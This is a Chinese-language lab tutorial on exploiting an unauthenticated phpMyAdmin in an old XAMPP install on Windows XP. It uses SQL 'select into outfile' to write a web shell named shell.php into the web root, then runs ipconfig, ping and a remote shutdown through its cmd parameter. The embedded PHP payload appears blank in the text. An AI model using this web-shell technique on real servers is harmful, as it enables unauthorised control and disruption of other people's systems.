<strong>本文僅用於討論網絡安全技術，以保護信息安全為目的，請勿用於非法用途！

什麼是phpmyadmin

之前我們在xp安裝過xampp web應用平臺，大家已經知道這個版本的xampp集成了apache、mysql、filezilla ftp等web應用軟件。那麼為了方便管理員操作數據庫，xampp裡面也會自帶phpmyadmin軟件，這是一個用於管理數據庫的軟件，而且一般以網頁的形式進行登錄管理的。

注意：xp如果重啟過，一定要雙擊"xampp"的桌面圖標進行運行！

而且要保證xampp必須如下圖所示：

登錄xp的phpmyadmin（kali瀏覽器輸入）：<strong>192.168.31.50/phpmyadmin

這個就是數據庫管理頁面：

生成php腳本

<strong>我們主要是利用這個版本的xampp 中的phpmyadmin配置有誤：什麼錯誤？就是這個版本的xampp登錄phpmyadmin不需要驗證登錄，如果設置正確，phpmyadmin是絕對不允許其他主機進行登錄的，畢竟這是數據庫操作後臺！另外即使可以登錄，你也要輸入憑證進行登錄！

我們要打開這個phpmyadmin管理頁面，然後使用mysql查詢命令向xp的web服務器上生成腳本文件，然後利用這個腳本文件獲取遠程服務器的shell。

詳細講：使用SQL中的SELECT語句，將一個php腳本寫入到web服務器上，形成一個web文件。最終藉助這個腳本程序遠程控制目標系統！不過這都是要藉助安裝在底層服務的apache服務，因為只有它可以運行php腳本文件。

• SQL查詢命令如下：

<strong>select "" into outfile "C:\\\\\\xampp\\\\htdocs\\\\shell.php"

這裡全部使用英文輸入，而且文件目錄使用的是雙反斜槓符號，而不是windows常用"\"！

<strong>select：SQL關鍵字語句；

<strong>：使用腳本url中的system()函數命令獲取系統權限，參數是cmd終端命令。然後這個腳本就會以system的身份執行。

<strong>into outfile：腳本生成就會寫進後面的藍色目錄下的自定義文件shell.php（shell.php是自己定義的，任意即可）

<strong>C:\\\\\\xampp\\\\htdocs\\\\shell.php：指定xampp安裝apache默認安裝路徑（默認是xampp\\htdocs\\），並且在這個根路徑下自動創建一個自定義的shell.php，前面的腳本就會被寫進這個shell.php中。

此時，已經完成了一個能夠調用xp系統權限下的cmd命令的php腳本！它存在xampp web服務器中的apache安裝路徑下，接下來只要使用任何電腦都可以遠程訪問這個shell.php文件，倘若給cmd參數指定選項，就會遠程操控xp服務器！

• 登錄（kali瀏覽器登錄）

<strong>192.168.31.50/phpmyadmin

這裡堅決不能複製上面的彩色代碼，只能手打輸入！

點擊"Go"，只要顯示下圖即表示生成腳本成功，否則，一定要嚴格檢查上面的SQL語句是否輸入錯誤！（一定要英文輸入法手打進去！！！）

另外大家可以修改language成中文

大家也可以查詢xp中xampp\\htdocs\\下是否有生成的shell.php文件。

• 既然攻擊命令的腳本已經生成，那該如何利用驗證呢？很簡單，kali瀏覽器直接訪問<strong>192.168.31.50/shell.php，就可運行我們上面生成的腳本。大家試試看！

提示警告：意思就是說我們沒有給system()函數指定參數，上面我們知道參數應該是cmd，所以這個cmd變量我們需要給他指定一個值！

利用此腳本攻擊phpmyadmin後臺

<strong>你只需要在kali瀏覽器輸入：

<strong>192.168.31.50/shell.php?cmd=xxxx

?cmd= ，表示指定參數cdm，=後面可以填寫任意的windows cdm命令。

例子運用：

• <strong>192.168.31.50/shell.php?cmd=ipconfig：通過攻擊重看xp的網絡配置

仔細看，竟然成功顯示了xp的ip、子網掩碼、路由器網關ip。

• <strong>192.168.31.50/shell.php?cmd=ping baidu.com

看看，就像使用本地的cmd終端一樣，竟然遠程操控xp ping了baidu.com,而且也返回了數據！說明xp可以連接互聯網的。

• <strong>192.168.31.50/shell.php?cmd=shutdown -t -s 10

這個就是cmd中的自動10秒鐘後遠程xp關機命令，是不是很好玩？

當然，xp關閉，我們的kali就和它失去通信了。

xp已經進行了關機，只是xp中的xampp服務沒有人為關閉，系統會彈出窗口提醒你是否強制關閉，一旦點擊"End Now"，就會關機！（任何windows電腦中只要還有主要的應用程序在運行，此時進行關機，都會提醒關閉程序後再關機的，以免造成程序數據丟失）

至於更多的cmd命令，你可以去網上搜搜，這裡不再詳細列出，請自行練習！

到目前為止，我們通過phpmyadmin數據庫管理後臺進行了SQL查詢命令，生成了調用遠程系統system()命令的腳本，指定參數是cmd終端，之後只要在kali瀏覽器中輸入生成腳本的路徑192.168.31.50/shell.php，指定cmd的可用cmd命令，就可以遠程控制xp web服務器，執行你想要控制目標系統的遠程命令！

kali滲透我想說

更多<strong>kali滲透、Web滲透、安卓滲透等相關技術。請關注小白嘿客，私信獲取。歡迎在下方評論區留言討論！

閱讀更多 小白嘿客 的文章

關鍵字: 腳本 信息 Windows